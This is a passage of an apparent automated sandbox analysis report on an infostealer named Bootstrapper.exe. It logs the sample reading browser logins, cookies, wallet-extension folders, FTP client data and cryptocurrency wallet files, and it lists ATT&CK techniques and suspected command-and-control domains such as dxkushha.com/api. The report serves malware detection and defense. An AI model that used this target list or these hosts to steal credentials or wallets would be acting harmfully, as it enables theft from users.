                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\Bootstrapper.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Bootstrapper.exe PID: 5416, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Bootstrapper.exe PID: 5416, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
                Deobfuscate/Decode Files or Information
                LSASS Memory241
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager21
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials24
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Bootstrapper.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://dxkushha.com/apivd0%Avira URL Cloudsafe
                https://dxkushha.com/D0%Avira URL Cloudsafe
                https://dxkushha.com/t0%Avira URL Cloudsafe
                https://dxkushha.com/Z0%Avira URL Cloudsafe
                https://dxkushha.com/rG0%Avira URL Cloudsafe
                https://dxkushha.com/api0%Avira URL Cloudsafe
                https://dxkushha.com/g0%Avira URL Cloudsafe
                https://dxkushha.com/0%Avira URL Cloudsafe
                https://dxkushha.com/apimpQ0%Avira URL Cloudsafe
                https://dxkushha.com:443/api0%Avira URL Cloudsafe
                https://dxkushha.com/L0%Avira URL Cloudsafe
                dxkushha.com0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                dxkushha.com
                104.21.80.1
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    high
                    rebuildeso.buzzfalse
                      high
                      appliacnesot.buzzfalse
                        high
                        screwamusresz.buzzfalse
                          high
                          cashfuzysao.buzzfalse
                            high
                            inherineau.buzzfalse
                              high
                              prisonyfork.buzzfalse
                                high
                                hummskitnj.buzzfalse
                                  high
                                  https://dxkushha.com/apitrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  dxkushha.comtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://dxkushha.com/tBootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/chrome_newtabBootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://dxkushha.com:443/apiBootstrapper.exe, 00000000.00000003.2541980886.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.000000000167C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoBootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://dxkushha.com/apivdBootstrapper.exe, 00000000.00000003.2502138943.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480224915.00000000016FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dxkushha.com/rGBootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.rootca1.amazontrust.com/rootca1.crl0Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://ocsp.rootca1.amazontrust.com0:Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://dxkushha.com/gBootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.ecosia.org/newtab/Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ac.ecosia.org/autocomplete?q=Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://crl.microBootstrapper.exe, 00000000.00000003.2480408350.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542183381.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://x1.c.lencr.org/0Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dxkushha.com/ZBootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
